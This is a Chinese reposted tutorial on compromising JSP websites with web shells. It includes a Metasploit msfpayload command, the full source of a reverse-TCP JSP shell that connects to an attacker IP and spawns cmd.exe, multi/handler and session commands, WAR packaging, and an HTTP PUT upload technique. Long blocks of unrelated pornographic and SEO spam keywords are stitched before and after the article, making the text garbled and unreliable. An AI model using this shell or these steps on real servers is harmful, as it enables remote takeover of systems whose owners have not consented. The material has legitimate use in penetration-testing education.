精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

外國大牛教你玩轉(zhuǎn)JSP Shell

安全 應用安全
現(xiàn)如今,使用JSP開發(fā)的的網(wǎng)站越來越多,很多大公司的數(shù)據(jù)中心也會使用這種架構(gòu)。在筆者的滲透經(jīng)驗之中,拿下JSP網(wǎng)站的主要方法就是上傳Shell從而執(zhí)行命令。在本文中筆者將舉兩個JSP shell code的例子,和幾個常見的上傳shell的方法。

什么是WebShell

WebShell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,也可以將其稱做為一種網(wǎng)頁后門。黑客在入侵了一個網(wǎng)站后,通常會將這些asp或php后門文件與網(wǎng)站服務器WEB目錄下正常的網(wǎng)頁文件混在一起,然后就可以使用瀏覽器…

[[114327]]

現(xiàn)如今,使用JSP開發(fā)的的網(wǎng)站越來越多,很多大公司的數(shù)據(jù)中心也會使用這種架構(gòu)。在我的滲透經(jīng)驗之中,拿下JSP網(wǎng)站的主要方法就是上傳Shell從而執(zhí)行命令。在下面的文章中我將舉兩個JSP shell code的例子,和幾個常見的上傳shell的方法。

JSP Shell

對于不怎么熟悉Web Shell的人來說,我前文指的JSP Shell是一段"Java Server Page"這段代碼可以允許任何指令在服務器上執(zhí)行。一般來說,Shell通過一個HTML from來接受需要執(zhí)行的指令。下面,我對于每個例子都會給出基本的Shell代碼。我個人比較喜歡用,Metasploit JSP shells,因為它具有很好的穩(wěn)定性和清爽的界面。

基本JSP shell

這是一個最簡單的 JSP Shell,使用方法如下。

(1)保存為cmd.jsp上傳到服務器。

(2)訪問這個頁面,執(zhí)行命令。

外國大牛教你玩轉(zhuǎn)JSP Shell

Metasploit JSP Shell

在攻擊中使用Metasploit JSP Shell大概需要六步。

(1)使用msfpayload創(chuàng)建一個cmd.jsp

(2)上傳cmd.jsp到服務器

(3)運行Metasploit multi-handler

(4)訪問cmd.jsp

(5)獲得shell

(6)如果是windows,升級到meterpreter shell

創(chuàng)建一個JSP Shell可以使用如下的命令,LHOST代表了自己主機的地址。

ruby C:\framework\msf3\msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.100.110 LPORT=53 R > cmd.jsp

上面的指令成功執(zhí)行之后,Metasploit會生cmd.jsp的源代碼,有些情況下你可能需要修改其中的一些變量來繞過防火墻的檢測。

  1. <%@page import="java.lang.*"%>   
  2. <%@page import="java.util.*"%>   
  3. <%@page import="java.io.*"%>  
  4.  <%@page import="java.net.*"%>  
  5.  <% class StreamConnector extends Thread  
  6.  {   
  7. InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os )   
  8. {   
  9. this.is = is;   
  10. this.os = os;   
  11. }   
  12. public void run()  
  13. {   
  14. BufferedReader in = null;  
  15. BufferedWriter out = null;  
  16. try { in = new BufferedReader( new InputStreamReader( this.is ) );  
  17. out = new BufferedWriter( new OutputStreamWriter( this.os ) );  
  18. char buffer[] = new char[8192];  
  19. int length;  
  20. while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )   
  21. {   
  22. out.write( buffer, 0, length );   
  23. out.flush();  
  24. }  
  25. }  
  26. catch( Exception e ){} try { ifin != null ) in.close();  
  27.  if( out != null ) out.close();   
  28. }   
  29. catch( Exception e ){}  
  30.  }   
  31. try { Socket socket = new Socket( "192.168.100.110", 53 );  
  32.  Process process = Runtime.getRuntime().exec( "cmd.exe" );  
  33. new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();  
  34.  ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();   
  35. }   
  36. catch( Exception e ) {}  
  37.  %> 

之后就是把cmd.jsp文件上傳到目標服務器。假設(shè)上傳后的地址是,http://www.victim.com/cmd.jsp之后就開始運用Metasploit multi handler,打開msfconsole使用如下命令。

use exploit/multi/handler setg LHOST 192.168.100.110 setg LPORT 53 setg PAYLOAD java/jsp_shell_reverse_tcp setg SHELL cmd.exe exploit –j -z

最后訪問 http://www.victim.com/cmd.jsp ,msfconsole就會受到反彈回來的鏈接。

你可以通過以下的指令訪問這條shell

sessions –I 1

如果目標主機是一個windows主機,可以用以下的指令吧shell升級成一個meter-preter shell

sessions –U 1

打包JSP Shells

有些情況下,需要把cmd.jsp打包成一個WAR文件(比如JBoss).在windows環(huán)境下,需要如下幾步。

(1)安裝JDK

(2)新建 WEB-INF目錄

(3)在 WEB-INF/web.xml 中輸入如下內(nèi)容

  1. <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
  2.  xsi:schemalocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4">  
  3. <servlet-name>Command</servlet-name>   
  4. <jsp-file>/cmd.jsp</jsp-file>  
  5. </web-app> 

(4)使用如下命令可以把jsp,文件打包成jar包。

"C:\Program Files (x86)\Java\jdk1.6.0_26\bin\jar.exe" cvf cmd.war WEB-INF cmd.jsp

Shell上傳

使用PUT方法

PUT方法是HTTP的一個擴展協(xié)議,允許用戶向服務器上傳文件。很久以前這個漏洞還是很流行的。

基本所有掃描工具都可以,掃描到這個漏洞,也可以通過ncat之類的工具找到這個漏洞。我比較喜歡

使用burp,使用burp檢測這個漏洞,需要如下幾步。

(1) 進入repeater tab選項卡

(2) 構(gòu)造如下文件頭

PUT /path/cmd.jsp HTTP/1.1 Host: Content-Length: 0

(3) 在文件頭下面連續(xù)輸入兩次回車之后輸入JSP shell code。

(4) 在burp下提交構(gòu)造好的包。

上傳方式

一般情況下,網(wǎng)站對于上傳文件的類型都有很嚴格的控制,但攻擊者仍然有幾種方法來繞過他們。這里就不詳細敘述了。

發(fā)布WAR文件

有一些服務器軟件會使用到WAR,其中一些會提供用戶上傳WAR文件的接口。有些會允許用戶使用一些外部源。Josh Abraham 寫了一些jBoss metasploit exploits,叫做jboss_maindeployer。這里還有一篇比較不錯的paper來講針對jBoss的攻擊。

文件共享

有的時候,網(wǎng)站的主目錄會被部署到ftp服務器上,如果能猜到密碼或者是ftp使用了默認的密碼。就可以通過ftp來上傳shell。

其實這是一篇科普文。最后對于文件上傳技巧的敘述比較冗長有刪節(jié)。

原文地址:https://www.netspi.com/blog/entryid/126/hacking-with-jsp-shells

責任編輯:藍雨淚 來源: FreeBuf
相關(guān)推薦

2018-03-22 10:26:13

2018-05-12 16:26:17

互聯(lián)網(wǎng)VPC子網(wǎng)

2024-04-09 12:08:51

Next組件Next.js

2011-08-10 15:58:12

WPS符號欄

2010-07-27 09:17:23

服務器整合

2021-05-18 14:42:55

PythonMySQL

2009-06-16 09:06:37

JavaMailJSP

2015-03-23 12:33:28

2013-09-10 10:20:12

數(shù)據(jù)大數(shù)據(jù)大數(shù)據(jù)應用

2013-03-13 09:56:10

2012-04-17 14:33:00

牛排New iPad

2011-01-28 15:47:15

webOS 2.1

2023-08-18 14:39:02

2019-05-16 15:54:59

人工智能AI

2021-12-10 08:39:50

SQLPLUS Oracle 數(shù)據(jù)庫

2014-08-19 09:10:45

IT運維

2011-06-09 11:39:04

噴墨打印機技巧

2016-11-17 16:58:01

華為 手機

2018-02-07 16:05:59

MySQLMyRocksRocksDB

2020-04-26 19:12:29

shell腳本Linux
點贊
收藏

51CTO技術(shù)棧公眾號

欧美一区二区三区综合| 老鸭窝毛片一区二区三区| 国产福利精品一区二区| 日韩精品中文字| 97视频中文字幕| 欧洲美熟女乱又伦| 偷拍自拍在线看| 国产成人av一区二区三区在线| 一本色道久久88精品综合| 欧美日韩不卡在线视频| 国产理论片在线观看| 精品国产一区二区三区香蕉沈先生 | 91国在线视频| 五月综合久久| 精品国产乱码久久久久酒店| 亚洲综合成人婷婷小说| 99精品中文字幕| 国产精品成人国产| 国产日产欧美精品一区二区三区| 欧美在线视频播放| 亚洲の无码国产の无码步美| 久久久123| 亚洲精品2区| 欧美剧在线免费观看网站 | 久久6免费视频| 日本精品一区二区三区在线播放| 欧美a一区二区| 亚洲精品久久久久久久久久久久| 日韩伦理在线免费观看| 亚洲1卡2卡3卡4卡乱码精品| 国产精品1区2区3区| 国产精品国产亚洲伊人久久| 林心如三级全黄裸体| 97欧美成人| 午夜久久久久久久久久一区二区| 国内精品久久国产| 精品免费囯产一区二区三区| 久久99国产精品视频| 在线视频你懂得一区二区三区| 日产精品久久久一区二区| www.com亚洲| 91亚洲国产高清| 欧美mv日韩mv| 成人观看免费完整观看| 在线视频婷婷| 国产不卡一区视频| 亚洲www在线观看| 亚洲天堂男人网| 狠狠爱综合网| 亚洲夜晚福利在线观看| 天天摸天天舔天天操| 天天综合网天天| 自拍偷拍国产精品| 狠狠色综合网站久久久久久久| 中文字幕69页| 亚洲国产老妈| 久久久国产91| 少妇毛片一区二区三区| 国产91欧美| 欧美天堂亚洲电影院在线播放| 无码人妻aⅴ一区二区三区日本| 国产精品老熟女视频一区二区| 青青草97国产精品免费观看无弹窗版| 日韩av毛片网| 久久国产精品国语对白| 欧美一性一交| 在线播放中文字幕一区| 欧美精品久久久久久久免费| 最近高清中文在线字幕在线观看| 亚洲国产激情av| 国产一区二区黄色| 日韩美女一级视频| 国产福利精品一区二区| 国产精品v欧美精品v日韩精品 | 欧美亚一区二区| 在线观看免费成人av| 在线三级中文| 国产亚洲精久久久久久| 日本一区二区三区在线视频| 亚洲精品97久久中文字幕无码| 日日摸夜夜添夜夜添国产精品| 欧美wwwxxxx| 性高潮久久久久久久| 午夜日韩影院| 9191成人精品久久| 911亚洲精选| 先锋影音一区二区| 色婷婷国产精品综合在线观看| 日韩精品在线观看av| 精品视频在线一区二区| 欧美国产97人人爽人人喊| 在线观看成人av电影| 日本v片在线免费观看| 国产日韩欧美一区二区三区乱码| 永久域名在线精品| 19禁羞羞电影院在线观看| 亚洲欧洲av在线| 欧美大黑帍在线播放| 国产中文字幕在线| 99久久精品免费看| 99视频在线| 国产欧美日韩成人| 美女性感视频久久| 国产一区喷水| 精品国产丝袜高跟鞋| 福利视频第一区| 精品这里只有精品| 白浆在线视频| 亚洲成人动漫精品| 热99这里只有精品| 成人av在线播放| 欧美一卡在线观看| 自拍视频第一页| 日本免费一区二区视频| 亚洲人成77777在线观看网| 精品夜夜澡人妻无码av| 亚洲区小说区| 亚洲一二在线观看| 日韩伦理在线视频| 亚洲专区免费| 国产精品久久久久久久久久久久 | 欧美激情亚洲综合| 亚洲激情女人| 欧美最顶级丰满的aⅴ艳星| 国产又大又黄的视频| 久久这里都是精品| 视频一区不卡| 欧美精品电影| 一区二区三区四区国产精品| 超碰超碰超碰超碰超碰| 黑人极品ⅴideos精品欧美棵| 亚洲一区二区视频| 三上悠亚久久精品| 日韩精品亚洲专区在线观看| 在线观看久久久久久| 精品国产一区二区三区四| 不卡一卡二卡三乱码免费网站| 精品一区久久久| 欧美黄色视屏| 欧美成人性战久久| 免费人成年激情视频在线观看| 日韩视频三区| 国产精品第七影院| 久草在现在线| 色综合天天视频在线观看| 国产偷人妻精品一区| 亚洲美女少妇无套啪啪呻吟| 国产不卡一区二区在线观看 | 日本中文字幕在线不卡| 成人h动漫免费观看网站| 日韩精品在线免费| 国产成人自拍视频在线| 日本伊人色综合网| 欧美一二三区| 色香欲www7777综合网| 亚洲欧美日韩成人| 成熟的女同志hd| 日韩视频在线一区二区三区 | 亚洲精品国产精品乱码不卡| 亚洲麻豆国产自偷在线| 黄色免费视频大全| 偷窥自拍亚洲色图精选| 日韩免费观看高清| 在线观看精品一区二区三区| 欧美日韩国产精品自在自线| 精品1卡二卡三卡四卡老狼| 成人av国产| 久久久久久久av| 成人黄色激情视频| 丰满白嫩尤物一区二区| 国产www免费| 秋霞影视一区二区三区| 国产精品第七影院| av理论在线观看| 欧美一区二区视频网站| 日本少妇性生活| 久久精品亚洲国产奇米99| 欧美日韩不卡在线视频| 亚洲综合图色| 96精品久久久久中文字幕| 91福利在线尤物| 亚洲人成电影在线| 91麻豆成人精品国产| 亚洲国产三级在线| 极品人妻videosss人妻| 国模娜娜一区二区三区| 99国内精品久久| 欧美成人黄色网址| 欧美日韩免费| 欧美经典三级视频一区二区三区| 黄色www网站| 久久精品不卡| 国产欧美日韩在线播放| 日本综合视频| 欧美视频完全免费看| 三级一区二区三区| 亚洲三级影院| 在线视频亚洲自拍| 欧美成人一区在线观看| 国产在线观看精品| av在线播放免费| 91九色02白丝porn| 国产肥白大熟妇bbbb视频| 久久福利资源站| 在线观看精品视频| 美女网站色精品尤物极品姐弟| 欧美激情一级欧美精品| 九色在线播放| 亚洲国产私拍精品国模在线观看| 一级片免费观看视频| 欧美日韩精品中文字幕| 加勒比婷婷色综合久久| 国产欧美一区二区精品忘忧草| 韩国黄色一级片| 久草在线在线精品观看| www.亚洲天堂网| 狠狠色狠狠色综合日日tαg| 中文精品一区二区三区| 国产精品入口久久| 国产精品色午夜在线观看| а天堂8中文最新版在线官网| 精品播放一区二区| 91精品国产乱码久久久张津瑜| 国产精品国产精品国产专区不蜜 | 亚洲午夜av久久乱码| 男人天堂综合网| 狠狠躁夜夜躁人人爽天天天天97| 亚洲二区在线播放| 国产精品区一区二区三区| 亚洲欧美偷拍另类| 欧美深夜福利| 中文字幕在线中文字幕日亚韩一区| 国产成人精品999在线观看| 国产自产精品| 日本欧美韩国国产| 精品国产综合| 群体交乱之放荡娇妻一区二区 | 亚洲一区二区福利视频| 免费观看久久久4p| 中文字幕在线综合| 国产精品99免费看| 视频一区二区三区免费观看| 免费av一区二区三区四区| 久久偷看各类wc女厕嘘嘘偷窃| 色天使综合视频| 国产精品18久久久久久首页狼| 日本视频在线免费观看| 日韩在线观看免费全集电视剧网站 | 中文字幕av观看| 91香蕉视频黄| 在线观看国产福利| 久久国产麻豆精品| a级黄色小视频| 亚洲国产高清视频| 超碰成人免费在线| 免费在线欧美黄色| 9久久婷婷国产综合精品性色 | 久久夜精品香蕉| 亚洲 国产 欧美 日韩| 欧美日韩视频一区二区| 中文字幕免费播放| 亚洲国产欧美一区二区三区丁香婷| 青娱乐免费在线视频| 亚洲国产综合91精品麻豆| 日产精品久久久久| 色综合天天天天做夜夜夜夜做| 一级黄色在线观看| 精品久久久久久久久久久| 国产精品100| 日韩欧美主播在线| 久久免费精彩视频| 国产精品国产三级国产aⅴ入口| 久久久久久久麻豆| 久久久久久久网| www中文在线| 一区二区高清在线| 成人无码精品1区2区3区免费看| 专区另类欧美日韩| 国产无码精品视频| 亚洲黄色小说网站| 天天操天天爽天天干| 在线免费观看日韩欧美| 国产毛片毛片毛片毛片| 亚洲国产欧美自拍| 成人jjav| 隔壁老王国产在线精品| 在线观看小视频| 欧美中文在线观看| 久久伦理中文字幕| 91欧美激情另类亚洲| 久久久久毛片| 国产精品视频久| 粉嫩一区二区三区四区公司1| 成人免费视频网址| 欧美视频第一| 国产精品入口免费| 99这里只有精品视频| 欧美重口乱码一区二区| 欧美一区成人| 日本a级片在线播放| 久久婷婷丁香| 免费看a级黄色片| 丝袜亚洲另类欧美综合| 99久久综合网| 成人一区二区三区视频| 丰满人妻一区二区三区免费视频棣| 久久噜噜亚洲综合| 久久久久免费看| 欧美日韩一区二区三区视频 | 中文字幕日韩精品在线观看| 男人的天堂在线免费视频| 精品亚洲永久免费精品| av激情在线| 国产欧美精品一区二区| 电影91久久久| 日韩精品久久一区| 99精品国产99久久久久久福利| 国内自拍第二页| 国产欧美精品一区二区色综合朱莉| 日本熟妇成熟毛茸茸| 日韩精品综合一本久道在线视频| 亚洲国产欧美另类| 久久精品99久久久香蕉| 国产综合色区在线观看| 美国av一区二区三区| 在线日韩视频| 中国特级黄色大片| 亚洲精品欧美专区| 一本久道久久综合无码中文| 亚洲欧美中文日韩在线v日本| 少妇淫片在线影院| 国产精品福利在线观看网址| 蜜臀av一区| 久久久久久人妻一区二区三区| 国产福利91精品| 国产少妇在线观看| 制服丝袜亚洲播放| 麻豆影院在线| 成人观看高清在线观看免费| 日韩欧美三级| 国产精品日韩三级| 国产精品一区二区无线| 亚洲av网址在线| 亚洲mv在线观看| 日韩一级中文字幕| 性欧美在线看片a免费观看| 精品成人av| 日韩欧美手机在线| 青青草97国产精品免费观看无弹窗版| 九九九视频在线观看| 夜夜嗨av一区二区三区网页| a天堂在线观看视频| 亚洲男人第一网站| 黄色综合网址| 亚洲一区二区自拍| 你懂的视频一区二区| 原创真实夫妻啪啪av| 亚洲最大色网站| 天天干天天做天天操| 久久精品视频免费播放| 婷婷久久免费视频| 欧美另类videos| 成人午夜在线免费| av黄色在线看| 怡红院精品视频| 四虎国产精品免费久久| 2021狠狠干| 99久久综合精品| 唐朝av高清盛宴| 欧美在线观看视频一区二区 | 成人性生生活性生交12| 国产精品私房写真福利视频| 国产精选久久久| 韩国一区二区电影| 国产一区二区三区四区二区| 亚洲欧美aaa| 亚洲va天堂va国产va久| 激情在线视频| 成人两性免费视频| 在线日本高清免费不卡| 538精品视频| 欧美sm美女调教| 成人国产精品| 久久亚洲a v| 欧美国产亚洲另类动漫| 国产成人精品av在线观| 欧美最顶级的aⅴ艳星| 亚洲激情中文在线| 亚洲精品视频久久久| 天天综合日日夜夜精品| 高清av在线| 国产精品爱啪在线线免费观看| 天天精品视频| 久久久久久综合网| 狠狠久久亚洲欧美专区| 黄色片免费在线观看| 欧美日韩精品免费观看| 先锋影音久久| 欧美成人777| 国产一区二区三区丝袜|